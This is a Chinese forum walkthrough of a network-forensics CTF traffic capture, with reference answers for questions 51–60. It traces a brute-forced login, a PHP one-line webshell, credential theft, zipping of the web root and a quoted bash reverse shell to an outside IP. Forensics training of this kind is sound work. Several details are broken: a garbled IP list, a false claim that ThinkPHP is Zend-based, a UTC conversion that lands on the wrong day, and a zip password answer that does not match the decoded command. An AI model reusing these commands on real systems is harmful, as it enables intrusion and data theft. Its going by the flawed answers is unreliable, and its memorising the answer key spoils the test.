找回密码
立即注册
搜索
热搜: Java Python Linux Go
发回帖 发新帖

465

积分

0

好友

57

主题
发表于 8 小时前 | 查看: 2| 回复: 0

本文将通过一个完整的网络攻防演练流量包,手把手演示如何使用 Wireshark 进行入侵事件分析、溯源攻击路径并提取关键信息。文章包含从攻击者IP定位到数据库密码获取的全流程详解。

51. 攻击者的IP为?(答案格式:192.168.1.1)

参考答案:10.211.75.6

如何快速定位攻击者的IP呢?我们可以从几个不同的统计维度入手。

首先,尝试使用 Wireshark 的 IPv4 地址统计功能,查看流量中出现次数最多的 IP。从下图的统计结果可以看出,192.168.1.959.110.185.4910.211.75.6 是出现次数最多的三个地址。

Wireshark IPv4地址流量统计

其次,查看会话统计,观察哪些主机对之间的通信最为频繁。

Wireshark会话统计界面

不过,仅看统计信息有时不够直观。我们可以采用更直接的过滤方法:攻击行为往往涉及向网站后台提交数据(如登录尝试),因此可以过滤所有 HTTP POST 请求。使用过滤条件:http.request.method=="POST"

过滤显示HTTP POST请求

通过分析这些 POST 请求的源和目的,可以清晰地看到攻击流量主要来自 10.211.75.6 发往 192.168.0.177。因此,攻击者是 10.211.75.6,被攻击服务器是 192.168.0.177

AI分析确认攻击者IP及行为

52. 被攻击服务器的网站框架是?

参考答案:zend

确定了攻击双方后,要分析网站框架,就需要查看被攻击服务器(192.168.0.177)返回的 HTTP 响应数据。我们过滤源 IP 为被攻击服务器的流量:ip.src==192.168.0.177,并关注它发给攻击者(10.211.75.6)的响应。

过滤源IP为被攻击服务器的流量

在分析过程中,你可能会发现网站使用了 PbootCMS,但 PbootCMS 是一个基于自研框架的 PHP 内容管理系统,而非单一的网站框架。

关于PbootCMS是CMS而非纯框架的说明

通过更深入的分析(例如检查 HTTP 响应头中的 X-Powered-By 字段或 Cookie 中的特征),可以确认其底层框架为 Zend(具体为基于 Zend 开发的 ThinkPHP)。后续的分析也印证了这一点。

AI分析确认网站框架为基于Zend的ThinkPHP

53. 攻击者对网站后台登录进行了暴力破解,成功获取到的用户密码为?(格式:按实际值填写)

参考答案:admin123

既然攻击目标是后台登录,那么登录行为必然是 POST 请求。我们使用过滤条件 http.request.method=="POST" 进行筛选。同时,后台登录地址通常包含 admin 关键词。在过滤结果中,按时间排序,找到相关的登录请求数据包。

过滤显示针对后台的POST登录请求

追踪这些登录请求的 TCP 流或直接查看数据包详情,可以在表单数据(Form Data)中找到提交的用户名和密码。

HTTP POST请求详情显示用户名和密码

由此可知,成功破解的密码是 admin123

54. 攻击者第一次成功登录网站管理后台的UTC时间为?(格式:2025-01-01 00:00:00)

参考答案:2025-05-27 16:17:10

承接上一题,攻击者 10.211.75.6192.168.0.177 发起了多次后台登录尝试。在流量中,第一次出现登录成功(可能伴随会话Cookie设置或跳转)的请求时间戳,即为首次成功登录的时间。我们需要在过滤出的 POST 到 admin 路径的请求中,找到那个标志成功登录的请求包,查看其时间。

包含登录请求时间戳的流量列表

例如,图中时间戳为 2025-05-27 00:17:10.977875 的请求可能是一个关键节点。注意 Wireshark 默认显示的是捕获时的本地时间,但题目要求 UTC 时间,通常需要根据时区进行换算(本例中假设捕获时间为 UTC+8,则对应 UTC 时间为 2025-05-27 16:17:10)。

另外,也可以尝试使用更精确的过滤条件来定位登录请求,例如:

http.request.method =="POST" and http matches “password[^a-zA-Z0-9]|passwd[^a-zA-Z0-9]|pwd[^a-zA-Z0-9]|mima[^a-zA-Z0-9]”

55. 攻击者上传后所执行的一句话木马文件名为?(答案格式:1.doc)

参考答案:1657037870691680.phtml

题干提示为“一句话木马”,这种木马通常通过文件上传漏洞植入,并且之后攻击者会通过 HTTP POST 请求向该木马文件传递执行命令的参数。我们可以直接搜索包含 POST 请求行的流量,使用过滤条件:http contains “POST[“。因为 Wireshark 在解析 HTTP 请求行时,会将其格式化为 POST [请求路径] HTTP/版本号 的样式。

HTTP请求行标准格式化说明

应用过滤条件后,可以发现一个不寻常的 POST 请求,路径指向一个 .phtml 文件,这很可能就是一句话木马。

过滤发现对.phtml文件的POST请求

对该请求进行追踪 TCP 流分析,可以清楚地看到攻击者通过参数 h4ck4fun 向文件 /static/upload/other/20220706/1657037870691680.phtml 提交命令。因此,一句话木马的文件名就是 1657037870691680.phtml

追踪TCP流显示木马文件和密码参数

56. 攻击者获取到的服务器账号权限为?

参考答案:www-data

既然已经定位到一句话木马文件,接下来就围绕这个文件分析攻击者执行了哪些命令。使用过滤条件:http contains “/static/upload/other/20220706/1657037870691680.phtml”

在过滤结果中,我们会看到多个请求。其中,携带了 application/x-www-form-urlencoded 内容类型的请求,才是攻击者提交命令的请求;而其他没有此内容的,可能只是普通的页面访问。

例如,第一个执行的命令可能是 phpinfo(),用于探查服务器信息,从中也能再次确认网站使用的 Zend 框架。

通过木马执行phpinfo()命令

phpinfo响应显示Zend框架信息

继续向下查找,会发现攻击者执行了 whoami 命令来查询当前权限,返回结果是 www-data。这是一个在 Web 服务器(如 Nginx、Apache)中常见的运行账户。

通过木马执行whoami命令返回www-data

57. 网站mysql数据库的连接密码为?(答案格式:按实际值填写)

参考答案:p4ssw0rd

继续使用过滤条件 http contains “/static/upload/other/20220706/1657037870691680.phtml” 分析攻击者后续操作。在流量中,可以发现攻击者通过木马执行了读取网站配置文件(如 database.php)的命令。

通过木马读取数据库配置文件

在服务器的响应内容中,直接暴露了数据库的配置信息,包括数据库类型、主机、用户名和密码。从中可以清晰地看到连接密码为 p4ssw0rd

58. 数据表ay_user中用户名xiaoming的密码为?

参考答案:1qaz2wsx

从上一题已知目标使用 MySQL 数据库。要探查数据库内的具体数据,攻击者需要建立数据库连接并执行 SQL 查询。这些操作会通过 TCP 协议传输 MySQL 协议数据。因此,我们可以使用过滤条件:tcp contains “mysql”

过滤包含mysql关键字的TCP流量

过滤后会出现少量数据包,通常攻击者发起的查询流量值得重点关注。选中相关数据包,右键选择“追踪流” -> “TCP流”,可以完整看到整个 MySQL 会话的明文通信内容(如果未加密)。

在Wireshark中追踪TCP流

在追踪流的窗口中,可以看到攻击者执行的一系列 SQL 命令,例如查询数据库名、表名,最终查询 ay_user 表中用户 xiaoming 的密码。

TCP流显示SQL查询过程及结果

查询结果中,密码字段显示为一串像是 Base64 编码的字符串 MXFhejJ3c3g=

SQL查询结果返回Base64编码的密码

对该字符串进行 Base64 解码,即可得到明文密码 1qaz2wsx

59. 攻击者把网站进行了打包,打包的密码为?

参考答案:5034737377307264

继续使用过滤条件 http contains “/static/upload/other/20220706/1657037870691680.phtml” 进行分析。在后续的流量中,攻击者通过木马执行了系统命令,例如使用 zip 命令打包网站目录。

通过木马执行zip打包命令的HTTP请求

请求中的命令参数经过了 URL 编码。我们可以复制编码后的字符串(如 system%28%22zip+-P+50347373777307264...%22%29%3B)进行解码。

URL解码显示打包命令及密码

解码后,命令清晰地显示为 system(“zip -P 50347373777307264 www.zip /var/www/html”),其中 -P 参数指定的就是压缩包密码 50347373777307264。在 Wireshark 的详细面板中,有时也能直接看到解码后的表单数据。

Wireshark详情面板显示解码后的命令

60. 攻击者在服务器上进行反弹shell,连接的目标IP为?

参考答案:111.123.222.333

最后,我们依然使用过滤条件 http contains “/static/upload/other/20220706/1657037870691680.phtml” 查看攻击者输入的最后命令。在流量中,会发现攻击者提交了一段经过 Base64 编码的命令。

解码前,它看起来像是一段无意义的字符。这很可能是一条经过编码的反弹 Shell 命令,目的是让被攻击服务器主动连接攻击者控制的机器。

通过木马执行Base64编码的反弹Shell命令

将这段 Base64 编码的字符串(例如 YmFzaCAtaSA+JiAvZGV2L3RjcC8xMTEuMTIzLjIyMi4zMzMvNDQ0NCAwPiYx)进行解码。

Base64解码得到反弹Shell命令

解码后,得到经典的 Bash 反弹 Shell 命令:bash -i >& /dev/tcp/111.123.222.333/4444 0>&1。由此可知,攻击者期望服务器反向连接的目标 IP 是 111.123.222.333,端口是 4444


通过以上十个步骤,我们完成了一次完整的网络攻击流量回溯分析。从初始的 TCP/IP 协议流量筛选,到应用层 HTTP 协议的分析,再到系统命令和数据库操作的追踪,展现了网络安全事件响应的基本思路和 Wireshark 工具的实战用法。希望这篇详解能帮助你更好地理解网络取证分析的过程。如果你想深入探讨 网络/系统 安全或获取更多实战案例,欢迎访问云栈社区。




上一篇:Vue3主题切换工程实践:基于CSS变量与Class覆盖实现多主题与明暗模式
下一篇:Games Workshop禁止员工使用AI,坚守传统游戏开发模式
您需要登录后才可以回帖 登录 | 立即注册

手机版|小黑屋|网站地图|云栈社区 ( 苏ICP备2022046150号-2 )

GMT+8, 2026-1-18 16:30 , Processed in 0.281667 second(s), 38 queries , Gzip On.

Powered by Discuz! X3.5

© 2025-2026 云栈社区.

快速回复 返回顶部 返回列表